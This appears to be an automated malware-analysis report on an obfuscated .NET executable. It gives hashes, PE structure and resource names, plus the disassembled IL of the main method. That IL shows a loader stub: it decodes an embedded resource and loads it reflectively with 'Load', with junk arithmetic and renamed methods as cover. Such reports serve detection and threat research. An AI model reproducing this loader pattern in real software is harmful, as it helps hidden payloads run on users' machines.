Suspicious
Suspect

db46e796aeb3824eb0f596b3e0e7fd1b

PE Executable | MD5: db46e796aeb3824eb0f596b3e0e7fd1b | Size: 715.26 KB | application/x-dosexec


Characteristics

Symbol Obfuscation Score

Very high

Hash
MD5: db46e796aeb3824eb0f596b3e0e7fd1b
Sha1: 4725155e6b18d14ed94bcef69a03b48a170d4298
Sha256: 39d89923c65fd5f1d9957c9596e0c6fa9626cd24f2a6956639fd161e6bc70ea4
Sha384: 06fec9ddf4af51810535c415e1844d4e32c2764d48d9be19cb2310590158e31da4ba11790e3ab3309ff59d7061496656
Sha512: c7e387e2b806148a123f8b159375b116ddb639c380d1481eb552ddd48d9dbf69ba1faa7840d38a3b968f5815b3ba2d4087e44b178458d08481882cdb9cfce57d
SSDeep: 12288:Lbg9o2tVX5rVBo83tUsm+u6cgJxPLX4D0zuGDotN3g2S3ROEiI:g9oarVBo6tgNExj4D0Zk5I
TLSH: D5E4AE1123E95B68F5BEAB79957424108BF6F803E736DA9E7D8C44DE0932B80C652733

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
dHa5N2bi.g.resources
dHa5N2bi.Resources.resources
6e853af57f851e.Resources.resources
3426095c0
[NBF]root.Data
3426095c1
[NBF]root.Data
3426095c2
[NBF]root.Data
3426095c3
[NBF]root.Data
3426095c4
[NBF]root.Data
3426095c5
[NBF]root.Data
Informations
PE Detect: PeReader OK (file layout)
Module Name: dHa5N2bi
Full Name: dHa5N2bi
EntryPoint: System.Void dHa5N2bi.Lk2zt0WwRpo7/Tw8iroP6L1_q.7snPSg9z::dXj58bpFN3_y()
Scope Name: dHa5N2bi
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: dHa5N2bi
Assembly Version: 18.15.45.244
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: .NETFramework,Version=v4.6
Total Strings: 1347
Main Method: System.Void dHa5N2bi.Lk2zt0WwRpo7/Tw8iroP6L1_q.7snPSg9z::dXj58bpFN3_y()
Main IL Instruction Count: 196

Main IL

nop <null> nop <null> call System.Void System.Windows.Forms.Application::EnableVisualStyles() nop <null> ldc.i4.0 <null> call System.Void System.Windows.Forms.Application::SetCompatibleTextRenderingDefault(System.Boolean) nop <null> call System.String System.Environment::get_UserName() stloc.0 <null> call System.String System.Environment::get_MachineName() stloc.1 <null> call System.DateTime System.DateTime::get_Now() stloc.2 <null> ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr FocusFlow call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> call System.Boolean System.IO.Directory::Exists(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_11 ldloc.s V_11 brfalse.s IL_004A: nop ldloc.3 <null> call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> nop <null> nop <null> ldloc.3 <null> ldstr user.config call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_4 ldloc.s V_4 call System.Boolean System.IO.File::Exists(System.String) stloc.s V_12 ldloc.s V_12 brfalse.s IL_006F: nop ldloc.s V_4 call System.String System.IO.File::ReadAllText(System.String) stloc.s V_13 nop <null> nop <null> ldc.i4.s 26 call System.Int32 System.Math::Abs(System.Int32) stloc.s V_5 ldloca.s V_2 call System.Int64 System.DateTime::get_Ticks() conv.r8 <null> ldc.r8 1E-07 mul <null> call System.Double System.Math::Sin(System.Double) stloc.s V_6 ldloc.s V_5 call System.Object dHa5N2bi.wm6B7xCe/dBo3sq4RnG.sPa2Y4pjb::2rnBa4Qiof7L8(System.Int32) castclass System.Object[] stloc.s V_7 ldstr resources/7190456 ldc.i4.0 <null> newarr System.Object call System.String System.String::Format(System.String,System.Object[]) stloc.s V_8 ldloc.s V_7 ldc.i4.0 <null> ldloc.s V_8 stelem.ref <null> ldloc.s V_6 ldc.r8 0.5 cgt <null> stloc.s V_14 ldloc.s V_14 brfalse.s IL_00D3: nop ldc.i4.1 <null> call System.Void 
System.Threading.Thread::Sleep(System.Int32) nop <null> nop <null> nop <null> ldloc.s V_7 ldc.i4.2 <null> ldloc.s V_7 ldc.i4.0 <null> ldelem.ref <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Byte[] dHa5N2bi.4Qpmw::7e_WfjX3zG(System.String) stelem.ref <null> call System.DateTime System.DateTime::get_UtcNow() stloc.s V_15 ldloca.s V_15 call System.Int32 System.DateTime::get_Day() ldc.i4.s 17 mul.ovf <null> ldloc.1 <null> callvirt System.Int32 System.String::get_Length() ldc.i4.3 <null> mul.ovf <null> add.ovf <null> stloc.s V_9 ldloc.s V_7 ldc.i4.3 <null> ldloc.s V_7 ldc.i4.2 <null> ldelem.ref <null> castclass System.Byte[] call System.Byte[] dHa5N2bi.Lk2zt0WwRpo7::Fs3mb(System.Byte[]) stelem.ref <null> ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> isinst System.Byte[] brfalse.s IL_0130: ldc.i4.0 ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> castclass System.Byte[] ldlen <null> conv.i4 <null> ldc.i4.s 100 cgt <null> br.s IL_0131: stloc.s V_16 ldc.i4.0 <null> stloc.s V_16 ldloc.s V_16 brfalse.s IL_0151: nop ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> castclass System.Byte[] ldc.i4.0 <null> ldelem.u1 <null> ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> castclass System.Byte[] ldc.i4.1 <null> ldelem.u1 <null> xor <null> stloc.s V_17 nop <null> nop <null> ldc.i4.1 <null> stloc.s V_10 call System.DateTime System.DateTime::get_Now() stloc.s V_15 ldloca.s V_15 call System.Int32 System.DateTime::get_Hour() ldc.i4.6 <null> blt.s IL_017A: ldc.i4.1 call System.DateTime System.DateTime::get_Now() stloc.s V_15 ldloca.s V_15 call System.Int32 System.DateTime::get_Hour() ldc.i4.s 22 cgt <null> br.s IL_017B: stloc.s V_18 ldc.i4.1 <null> stloc.s V_18 ldloc.s V_18 brfalse.s IL_0185: nop ldc.i4.1 <null> stloc.s V_10 nop <null> nop <null> ldloc.s V_10 stloc.s V_19 ldloc.s V_19 brfalse.s IL_01A3: nop ldstr L o a d ldloc.s V_7 ldc.i4.3 <null> ldelem.ref <null> call System.Object 
System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) call System.Object dHa5N2bi.sy3Sc7Bj/Xd2ek9sQz.nb8CQmy6jm/Mjz5ma.Ld8s0NjkgjF9B::Rkf5j1Ft(System.String,System.Object) pop <null> nop <null> nop <null> ldnull <null> stloc.s V_7 call System.Void System.GC::Collect() nop <null> leave.s IL_01D0: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_20 nop <null> nop <null> leave.s IL_01C8: nop call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01C8: nop nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01D0: nop nop <null> ret <null>
